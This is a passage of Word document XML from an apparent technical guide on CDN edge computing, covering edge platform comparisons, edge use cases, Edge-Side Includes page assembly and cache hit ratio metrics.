      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4CB1A14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9C1D83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Fastly Compute@Edge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25277E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Wasm (any language)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69052F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 1ms cold start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F8B205" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>60s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D22A67" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>80+ PoPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="11FAC2E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854EA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Deno Deploy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26398C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>V8 Isolates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7A9F81" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 10ms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45E438" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Flexible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50EF57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>30+ regions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C13469F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Use Cases for Edge Compute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A891887" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A/B testing at the edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287ED9EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AF546" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>User request → Edge function determines variant (hash of user ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79203D4B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Variant A: rewrite URL to /page-variant-a (cached separately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC4F4B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Variant B: rewrite URL to /page-variant-b (cached separately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DAE38F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>No origin involvement for the routing decision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258D3B1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication/authorization at the edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE1920" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6A2B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User request with JWT → Edge function validates token (check signature, expiry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D01E5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Valid: forward to origin (with user context headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEB00A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Invalid: return 401 immediately (origin never sees the request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A46798" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Personalization + caching hybrid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2704B8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ECB9CB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA08E5D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1. Fetch the base page from cache (same for everyone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70827C18" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  2. Fetch user-specific data from origin (small JSON).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF9DBA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  3. Merge personalized content into cached base page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2CFE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  4. Return fully personalized page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE708B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="7B902AA2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin load: only user-specific data requests (not full page renders).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C07426" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geolocation-based content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634B3D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4175E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge function reads user's country from request headers (CDN injects this).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F61704D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → US users: return USD prices (from US-variant cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E1D41" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → EU users: return EUR prices (from EU-variant cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565513F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → JP users: return JPY prices (from JP-variant cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EAC96A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API response transformation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D9837" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10052C02" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Edge caches the full API response (all fields).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175FAC8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge function strips fields based on the requesting client's permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622A207" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Different clients see different subsets — but origin serves one canonical response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE9213" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Edge-Side Includes (ESI) — Page Assembly at CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926D132" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How ESI works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71345363" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin returns an HTML template with ESI tags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FF033" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EE2D2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730435E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21954604" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;esi:include src="/header" max-age="86400" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ABCB43" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;div class="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1B1F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">      &lt;esi:include src="/product/123" max-age="3600" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513433E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB81E73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;esi:include src="/footer" max-age="86400" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64751371" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77C4F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB4B28" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN parses the response, identifies ESI includes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F363E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN fetches each fragment independently (each has its own cache and TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0B3E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN assembles the final HTML from cached fragments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722746B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serves the complete page to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8FC00" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Different parts of the page have different freshness requirements. The header/footer change once a month (cache for days). Product info changes daily (cache for hours). User-specific greeting changes per request (not cached). ESI handles this naturally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12483849" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="7BDA3F15">
          <v:rect id="_x0000_i4691" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A40968" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. CDN Cache Hit Ratio — The Critical Metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09C028" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 What Cache Hit Ratio Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DB597" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC53D2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Hit Ratio = Cache Hits / (Cache Hits + Cache Misses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB883C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What different hit ratios mean economically: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37"/>
        <w:gridCol w:w="3923"/>
        <w:gridCol w:w="2626"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="5882F00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A3E64C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hit Ratio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C6C142" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Origin Traffic (per 100K requests)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F0DE09" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Origin Load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4643417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3F7145" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50%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E94267" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50,000 requests to origin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A53731" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Heavy (barely helped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="0097ED6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337D60" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>80%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5D8B1D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>20,000 requests to origin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AEBD10" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Significant reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="6EA13C7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7A3831" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>90%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CA921B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>10,000 requests to origin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540719" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>10x reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4A7D417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9ABC10" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>95%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2D8941" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>5,000 requests to origin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F75B7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>20x reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="05E8569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466760" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>99%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F8973B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>1,000 requests to origin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CE859A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>100x reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D4F8D91" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targets by content type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6C6EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Static assets (images, CSS, JS): 95–99%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A1E02" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML pages (cacheable): 80–95%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359DF723" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>API responses (cacheable): 60–90%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081ECD57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Overall (mixed): 85–95%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B82AFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Factors That Reduce Hit Ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54562871" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Low TTL:</w:t>
      </w:r>
    </w:p>
